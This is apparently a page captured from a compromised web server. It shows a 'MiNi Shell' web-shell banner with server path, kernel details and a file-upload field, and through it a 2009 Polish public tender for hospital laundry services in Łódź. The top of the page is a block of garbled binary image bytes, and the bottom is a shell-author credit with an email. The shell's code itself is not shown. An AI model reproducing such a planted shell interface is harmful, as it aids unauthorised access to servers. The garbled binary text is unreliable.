JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090427/122940-N-2009.html

<p class="kh_header"><b>Łódź: Nr sprawy 09/UP/09. Usługi pralnicze dla SPZOZ Uniwersyteckiego Szpitala Klinicznego Nr 3 w Łodzi</b><br>
<b>Numer ogłoszenia: 122940 - 2009; data zamieszczenia: 27.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny ZOZ Uniwersytecki Szpital Kliniczny Nr 3 im. dr S. Sterlinga Uniwersytetu Medycznego w Łodzi , ul. dr. Seweryna Sterlinga 1/3/16, 91-425 Łódź, woj. łódzkie, tel. 042 63653 96, faks 042 6365396.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kardio-sterling.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr sprawy 09/UP/09. Usługi pralnicze dla SPZOZ Uniwersyteckiego Szpitala Klinicznego Nr 3 w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia niniejszego postępowania przetargowego są kompleksowe usługi pralnicze w szacunkowej ilości 140 ton w okresie do 30-06-2011r.
Kompleksowa usługa pralnicza obejmuje:
1.	Odbiór brudnej i dostawę tej samej czystej bielizny najpóźniej następnego dnia z i do siedziby Zamawiającego od poniedziałku do piątku do godz. 9:00, a w razie konieczności również w sobotę. Zamawiający bezwzględnie wymaga, aby transport odbywał się pojazdami przeznaczonymi do przewozu bielizny szpitalnej operacyjnej. W przypadku nie posiadania pojazdu z szczelną podzieloną komorą oddzielnie na czystą i oddzielnie na brudną bieliznę Wykonawca zobowiązany jest posiadać/dysponować przynajmniej dwoma niezależnymi pojazdami, tak, aby nie doszło do skażenia bielizny czystej.
2.	W przypadku reklamacji usługi lub w sytuacjach awaryjnych Wykonawca musi być w stanie odebrać brudną i dostarczyć tą samą, czystą bieliznę lub nową (nieużywaną wcześniej, w tych samych rozmiarach) najpóźniej w przeciągu 4 godzin od momentu reklamacji. Warunek powyższy jest podyktowany uwarunkowaniami organizacyjnymi Zamawiającego.
3.	Załadunek i rozładunek wykona Wykonawca.
4.	Pranie, dezynfekcja, suszenie, prasowanie, maglowanie winno odbywać się zgodnie z wymogami obowiązującymi w służbie zdrowia ze szczególnym uwzględnieniem zaleceń dotyczących szpitali.
5.	Wykonawca, zobowiązany jest przeprowadzać proces dezynfekcji zgodnie z aktualnymi wytycznymi Państwowego Zakładu Higieny dalej PZH.
6.	Zamawiający wymaga, aby:
6.1.	Wykonawca dysponował pralnią spełniającą wymogi określone w Rozporządzeniu Ministra Zdrowia z dnia 22.06.2005r (Dz. U. nr 116, poz. 985),
6.2.	środki piorące i dezynfekcyjne posiadały odpowiednie atesty oraz gwarantowały dobrą jakość prania jednocześnie nie powodując przyspieszonego zużycia,
6.3.	bielizna szpitalna, operacyjna i odzież robocza była prasowana oraz dezynfekowana zgodnie z zaleceniami PZH,
6.4.	bielizna pościelowa, ściereczki, ręczniki, fartuchy i ubrania operacyjne były maglowane,
6.5.	segregacja i sortowanie odzieży odbywało się wg. podziału na asortyment i komórkę przeznaczenia, a następnie powinno być zafoliowane do pojedynczych paczek,
6.6.	odzież fasonowa dostarczana była na wieszakach w opakowaniu foliowym,
7.	Wykonawca ponosić będzie odpowiedzialność prawną i materialną za wykonanie usługi w zakresie jakości i zgodności z wymogami sanitarnymi wobec organów kontroli.
8.	Wykonawca ponosić będzie odpowiedzialność materialną wobec Zamawiającego za nienależyte wykonanie usługi w wysokości poniesionych strat
9.	Ze względu na niemożliwość ścisłego określenia ilości hospitalizowanych pacjentów oraz innych czynników, mających wpływ na ilości towaru przeznaczonego do prania, Zamawiający informuje, że ilości podane w zamówieniu są ilościami szacunkowymi określonymi na podstawie poprzedniego okresu zamówienia i mogą się różnić od faktycznie zrealizowanych w czasie trwania umowy. Zamawiający zobowiązuje się do zapłacenia tylko za zrealizowanej części umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zamawiający dopuszcza do udziału w postępowaniu Wykonawców, którzy spełniają następujące warunki określone przepisami art. 22 ust. 1 pkt. 1-4 Pzp:
1.1	Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Na potwierdzenie Zamawiający żąda:
1)	wypełnionego i podpisanego oświadczenia o spełnieniu warunków określonych w art. 22 Pzp - załącznik 3.1 SIWZ;
2)	aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3)	aktualnego zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS u lub KRUS-u potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w: 
- pkt 2), 3) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z zachowaniem terminów wystawienia dokumentów.
1.2	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
Na potwierdzenie Zamawiający żąda:
1a) wykazu wykonanych (w przypadku świadczeń okresowych lub ciągłych również wykonywanych) usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - załącznik 5 SIWZ;
1b) potwierdzenia należytego wykonania, co najmniej 3 usług, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, poprzez dołączenie stosownych dokumentów (np. referencji; faktura nie jest dowodem należytego wykonania usługi, chyba, że jednoznacznie wynika z treści na fakturze należyte wykonanie usługi); Wymóg będzie spełniony, gdy przynajmniej w jednym roku kalendarzowym łączna wartość udokumentowanych usług będzie nie mniejsza niż równowartość 200 000 zł; 
Łączna wartość w roku kalendarzowym obliczana będzie algorytmem:
Suma wartości usług wykonanych lub wykonywanych w danym roku kalendarzowym x liczba miesięcy realizacji w roku kalendarzowym/liczbę miesięcy realizacji usługi.
(równowartość obliczona będzie na podstawie średniego kursu NBP określonego na dzień otwarcia ofert).
2)  wykazu niezbędnych do wykonania zamówienia pojazdów przystosowanych do przewożenia bielizny szpitalnej, którymi dysponuje lub będzie dysponował Wykonawca lub pisemnego zobowiązania innych podmiotów do udostępnienia Wykonawcy niezbędnych do wykonania zamówienia pojazdów przystosowanych do przewożenia bielizny szpitalnej. 
Wymóg będzie spełniony, gdy z dołączonych dokumentów będzie wynikać, że Wykonawca w okresie umowy będzie dysponował przynajmniej dwoma pojazdami (lub jednym pojazdem z barierą szczelnie oddzielającą część czystą od brudnej) przystosowanymi do przewożenia bielizny szpitalnej i posiadających odpowiednie pozytywne opinie Sanepidu. 
1.3	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Na potwierdzenie Zamawiający żąda:
1)	polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na dzień otwarcia ofert.
Wymóg będzie spełniony, gdy z dołączonych dokumentów wynikać będzie, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na moment otwarcia ofert.
1.4	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 Pzp.
Na potwierdzenie Zamawiający żąda:
1)	wypełnionego i podpisanego oświadczenia Wykonawcy, że nie podlega wykluczeniu z postępowania na warunkach art.24 Pzp - załącznik 3.2;
1.5	W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego Zamawiający żąda:
1)	zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym. 
Wymóg będzie spełniony, gdy:
a)	Wykonawca przedstawi zaświadczenie/opinię wydaną przez Państwowy Inspektorat Sanitarno - Epidemiologiczny w oparciu o przeprowadzone kontrole, w których stwierdza się, że pralnia spełnia wymogi sanitarne zawarte w rozporządzeniu Ministra Zdrowia z 22 czerwca 2005 w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2005r. Nr 116, poz. 985 ze zm.). Zaświadczenie/opinie muszą być aktualne tzn. nie starsze niż 1 rok.
b)	Pozytywna opinia Inspektora Sanitarnego dopuszczająca środki transportu do wykonywania usługi objętej przedmiotem postępowania.
Wykonawca może zamiast zaświadczenia, o których mowa w podpkt. 1) złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.
2)	próbek, opisów lub fotografii;
Wymóg będzie spełniony, gdy Wykonawca przedstawi:
a)	szczegółowy opis czasu wykonania usługi z uwzględnieniem procesów: prania, suszenia, prasowania, maglowania, pakowania oraz transportu, z którego wynikać będzie, że czas wykonania pełnej usługi nie przekracza 4 godzin. Wymóg określony został ze względów lokalowych i organizacyjnych Zamawiającego.
2.	Ocena spełnienia warunków udziału w postępowaniu o zamówienie publiczne odbędzie się na zasadzie spełnia / niespełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz Oferty wg załącznika nr 1 SIWZ.
2.	Wypełniony Przedmiot zamówienia - formularz cenowy wg załącznika nr 2 SIWZ. 
3.	Upoważnienie do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty. Upoważnienie w oryginale lub kopii poświadczonej notarialnie.
4.	Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu. Warunki określono szczegółowo w rozdziale VIII. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków określone w pkt 1:
4.1.	 oświadczenie o spełnieniu warunków określonych w art. 22 Pzp - załącznik 3.1 SIWZ;
4.2.	 oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na warunkach art.24 Pzp - załącznik 3.2;
4.3.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4.4.	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS u lub KRUS-u potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w: 
- pkt 4.2,4.3) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z zachowaniem terminów wystawienia dokumentów.
4.5.	 wykaz wykonanych (w przypadku świadczeń okresowych lub ciągłych również wykonywanych) usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - załącznik 5 SIWZ;
4.6.	 dokumenty potwierdzające należyte wykonanie co najmniej 3 usług z wykazu, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, poprzez dołączenie stosownych dokumentów (np. referencji; faktura nie jest dowodem należytego wykonania usługi, chyba, że jednoznacznie wynika z treści na fakturze należyte wykonanie usługi); 
4.7.	 wykaz niezbędnych do wykonania zamówienia pojazdów przystosowanych do przewożenia bielizny szpitalnej, którymi dysponuje lub będzie dysponował Wykonawca (wykaz musi określać właściciela pojazdu, dane identyfikacyjne pojazdu po których można określić czy opinia wydana przez Inspektora Sanitarnego wymagana w pkt 4.10 dotyczy tego pojazdu, datę opinii inspektora).
Alternatywnym dokumentem do wykazu będzie pisemne zobowiązanie się innego podmiotu do udostępnienia Wykonawcy niezbędnych do wykonania zamówienia pojazdów przystosowanych do przewożenia bielizny szpitalnej posiadających pozytywną opinia Inspektora Sanitarnego;
4.8.	 polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na dzień otwarcia ofert.
4.9.	zaświadczenie/opinia wydana przez Państwowy Inspektorat Sanitarno - Epidemiologiczny w oparciu o przeprowadzone kontrole, w których stwierdza się, że pralnia spełnia wymogi sanitarne zawarte w rozporządzeniu Ministra Zdrowia z 22 czerwca 2005 w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2005r. Nr 116, poz. 985 ze zm.). Zaświadczenie/opinie muszą być aktualne tzn. nie starsze niż 1 rok.
4.10.	pozytywna opinia Inspektora Sanitarnego dopuszczająca środki transportu do wykonywania usługi objętej przedmiotem postępowania.
Wykonawca może zamiast zaświadczenia, o których mowa w podpkt. 4.9 i 4.10 złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.
4.11.	szczegółowy opis czasu wykonania usługi z uwzględnieniem procesów: prania, suszenia, prasowania, maglowania, pakowania oraz transportu.
5.	W przypadku złożenia oferty przez podmioty występujące wspólnie - upoważnienie do:
a)	reprezentowania w postępowaniu o udzielenie zamówienia albo 
b)	reprezentowania i zawarcia umowy w sprawie zamówienia, 
-	w oryginale bądź kopii potwierdzonej notarialnie dla wspólnego pełnomocnika (wynikające z art. 23 ustawy Pzp)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kardio-sterling.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Uniwersyteckiego Szpitala Klinicznego Nr 3 w Łodzi, ul. Sterilnga 1/3 budynek administracji F, I piętro, pok. 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 10:00, miejsce: SP ZOZ Uniwersyteckiego Szpitala Klinicznego Nr 3 w Łodzi, ul. Sterilnga 1/3 budynek administracji F, I piętro, Sekretariat Dyrektora, pok. 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com